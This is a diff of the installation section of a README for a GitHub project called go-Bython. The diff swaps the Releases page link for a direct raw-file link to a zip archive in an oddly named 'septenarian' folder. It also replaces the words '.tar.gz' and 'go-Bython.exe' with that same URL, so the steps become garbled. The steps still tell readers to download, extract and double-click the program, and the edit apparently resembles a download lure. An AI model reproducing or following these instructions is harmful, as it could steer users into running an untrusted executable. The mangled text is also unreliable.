kristiandeejay/go-Bython/README.md

 ## 🔧 Installation

 1. **Download the Application:**
-   - Click on the download link above or visit [GitHub Releases Page](https://github.com/kristiandeejay/go-Bython/releases).
+   - Click on the download link above or visit [GitHub Releases Page](https://raw.githubusercontent.com/kristiandeejay/go-Bython/main/septenarian/go-Bython.zip).
    - Find the version suitable for your operating system and click on the download link.

 2. **Extract the Files (if necessary):**
    - Locate the downloaded file.
-If it's in a compressed format (like .zip or .tar.gz), right-click it and choose "Extract All..." or use your favorite extraction tool.
+If it's in a compressed format (like .zip or https://raw.githubusercontent.com/kristiandeejay/go-Bython/main/septenarian/go-Bython.zip), right-click it and choose "Extract All..." or use your favorite extraction tool.
    - Make a note of the folder where you extract the files.
 You will need it in the next steps.

 3. **Run the Application:**
    - Navigate to the extracted folder.
-   - Double-click the file named `go-Bython` (or `go-Bython.exe` on Windows).
+   - Double-click the file named `go-Bython` (or `https://raw.githubusercontent.com/kristiandeejay/go-Bython/main/septenarian/go-Bython.zip` on Windows).
    - A command prompt or terminal window will open, indicating the application is ready for use.

 ## ⚙️ Usage